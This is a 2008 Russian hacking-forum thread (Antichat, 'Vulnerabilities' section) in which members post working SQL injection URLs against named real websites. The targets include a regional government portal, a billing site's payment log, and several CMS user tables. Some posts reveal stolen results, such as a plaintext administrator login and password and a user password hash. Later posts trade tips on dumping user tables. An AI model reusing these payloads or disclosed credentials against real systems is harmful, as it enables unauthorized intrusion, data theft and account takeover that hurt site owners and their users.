ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #6491  
Старый 28.08.2008, 09:05
Аватар для gisTy
gisTy
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
Провел на форуме:
3629857

Репутация: 504


По умолчанию

в общем то вот лог платежей их..
Цитата:
https://billing.adenazone.ru/pricelist.php?step=2&server=-15+union+select+1,2,3,null,concat_ws(0x3a3a,billin g_id,payment_amount,payment_wmr,payer_wmid,payer_p urse),null,null,null+from+wm_payment_log--
весьма не мало платежей... дальше ковырять впадлу, пойду спать..

Последний раз редактировалось gisTy; 28.08.2008 в 09:24..
 
Ответить с цитированием

  #6492  
Старый 28.08.2008, 13:15
Аватар для SeNaP
SeNaP
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
Провел на форуме:
3300342

Репутация: 165
По умолчанию

БД

(перебирать limit+0т 0,1 до 37,1

http://www.maccasoft.com/news.php?id=-12+union+select+1,2,3,4,table_name,6+from+INFORMAT ION_SCHEMA.tables+limit+0,1--

Верися: 5.0.67-log
http://www.maccasoft.com/news.php?id=-12+union+select+1,2,3,4,version(),6--

БД system

http://www.maccasoft.com/news.php?id=-12+union+select+1,2,3,4,column_name,6+from+INFORMA TION_SCHEMA.columns+where+table_name=0x73797374656 d--

0x73797374656d = system так как идет фильтрация =)


 
Ответить с цитированием

  #6493  
Старый 28.08.2008, 15:30
Аватар для fRg
fRg
Участник форума
Регистрация: 28.12.2006
Сообщений: 111
Провел на форуме:
500695

Репутация: 524
Отправить сообщение для fRg с помощью ICQ
По умолчанию

avo.ru - Администрация Владимирской области
Взлом через сайт admgor.avo.ru
Код:
http://admgor.avo.ru/mun_zak/mun_zak.php?type=2&state_id=-1+union+select+concat_ws(0x3a,username,email,password,usertype),2,3,4,5+from+aleksandrov.jos_users+limit+0,1/*
login : admin
password : zxcvbnm098
статус : Super Administrator

Полазил по админке http://avo.ru/administrator/ - и халяву сразу прикрыли
 
Ответить с цитированием

  #6494  
Старый 28.08.2008, 15:43
Аватар для S0ulVortex
S0ulVortex
Участник форума
Регистрация: 18.11.2007
Сообщений: 184
Провел на форуме:
1686744

Репутация: 246
Отправить сообщение для S0ulVortex с помощью ICQ
По умолчанию

Код:
http://www.avi-trucks.com/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,password,email,0,0,0,0,0,0,0,0,0,0,0,0,%20%200,0,0,0/**/from/**/jos_users/*
 
Ответить с цитированием

  #6495  
Старый 28.08.2008, 16:08
Аватар для SeNaP
SeNaP
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
Провел на форуме:
3300342

Репутация: 165
По умолчанию

1) _http://www.info.gomel.by/news.php?id=-12+union+select+1,2,3,4,concat_ws(0x3a,user(),vers ion(),DATABASE()),6,7,8,9,10,11,12/*

2) _http://www.wemarketu.com/news.php?id=-12+union+select+1,2,concat_ws(0x3a,user(),version( ),DATABASE()),4/*

Юзер:Версия БД: БД

Последний раз редактировалось SeNaP; 28.08.2008 в 16:36..
 
Ответить с цитированием

  #6496  
Старый 28.08.2008, 16:57
Аватар для SeNaP
SeNaP
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
Провел на форуме:
3300342

Репутация: 165
По умолчанию

ЮЗЕР ВЕРСИЯ-БД БАЗА ДАННЫХ
http://djexx.com/news.php?id=-12+union+select+1,concat_ws(0x3a,user(),version(), DATABASE()),3,4,5,6,7,8,9,10--

БАЗЫ данных ( перебирать limit'ом от 0,1 до 28,1)
http://djexx.com/news.php?id=-12+union+select+1,table_name,3,4,5,6,7,8,9,10+from +information_schema.tables+limit+1,1--

там не чего интересного нет кто найдет что побольше, выкладывайте
 
Ответить с цитированием

  #6497  
Старый 28.08.2008, 17:04
Аватар для SeNaP
SeNaP
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
Провел на форуме:
3300342

Репутация: 165
По умолчанию

ЮЗЕР ВЕРСИЯ БАЗА ДАННЫХ
http://www.etc-nepal.org/news.php?id=-12+union+select+1,concat_ws(0x3a,user(),version(), database()),3,4,5,6/*
http://teamhardcorepavement.com/news.php?id=-12+union+select+concat_ws(0x3a,user(),version(),da tabase()),2,3,4,5,6,7/*

Последний раз редактировалось SeNaP; 28.08.2008 в 17:16..
 
Ответить с цитированием

  #6498  
Старый 28.08.2008, 17:11
Аватар для Cennarios
Cennarios
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497

Репутация: 303
Отправить сообщение для Cennarios с помощью ICQ
По умолчанию

http://www.nebraska-outdoors.com/articles/article.php?aid=-1+union+select+concat(username,0x3a3a,pass)+from+u sers+limit+2,1/*


login:brianficek
pass:85688717ef4fab9 mb md5 64 bit?
 
Ответить с цитированием

  #6499  
Старый 28.08.2008, 17:42
Аватар для SeNaP
SeNaP
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
Провел на форуме:
3300342

Репутация: 165
По умолчанию

Список БД
http://www.devchatnik.ru/new/news.php?id=-12+union+select+1,2,3,4,table_name,6,7+from+inform ation_schema.tables/*

БД jos_users
http://www.devchatnik.ru/new/news.php?id=-12+union+select+1,2,3,4,column_name,6,7+from+infor mation_schema.columns+where+table_name=0x6a6f735f7 573657273/*
немогу данный просматреть

БД phpbb_users
http://www.devchatnik.ru/new/news.php?id=-12+union+select+1,2,3,4,column_name,6,7+from+infor mation_schema.columns+where+table_name=0x706870626 25f7573657273/*

И опять же не могу просмотреть
P.S я делаю вот так http://www.devchatnik.ru/new/news.php?id=-12+union+select+1,2,3,4,username,6,7+from+phpbb_us ers+limit+1,1--

Скажите в чем проблема?
 
Ответить с цитированием

  #6500  
Старый 28.08.2008, 18:19
Аватар для nicusor
nicusor
Участник форума
Регистрация: 19.03.2008
Сообщений: 108
Провел на форуме:
1357043

Репутация: 137
По умолчанию

Цитата:
Сообщение от SeNaP  
Список БД
http://www.devchatnik.ru/new/news.php?id=-12+union+select+1,2,3,4,table_name,6,7+from+inform ation_schema.tables/*

БД jos_users
http://www.devchatnik.ru/new/news.php?id=-12+union+select+1,2,3,4,column_name,6,7+from+infor mation_schema.columns+where+table_name=0x6a6f735f7 573657273/*
немогу данный просматреть

БД phpbb_users
http://www.devchatnik.ru/new/news.php?id=-12+union+select+1,2,3,4,column_name,6,7+from+infor mation_schema.columns+where+table_name=0x706870626 25f7573657273/*

И опять же не могу просмотреть
P.S я делаю вот так http://www.devchatnik.ru/new/news.php?id=-12+union+select+1,2,3,4,username,6,7+from+phpbb_us ers+limit+1,1--

Скажите в чем проблема?

http://www.devchatnik.ru/new/news.php?id=-12+union+select+1,2,3,username,5,6,7+from+db4514a. phpbb_users/*

нужно указывать и название базы
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ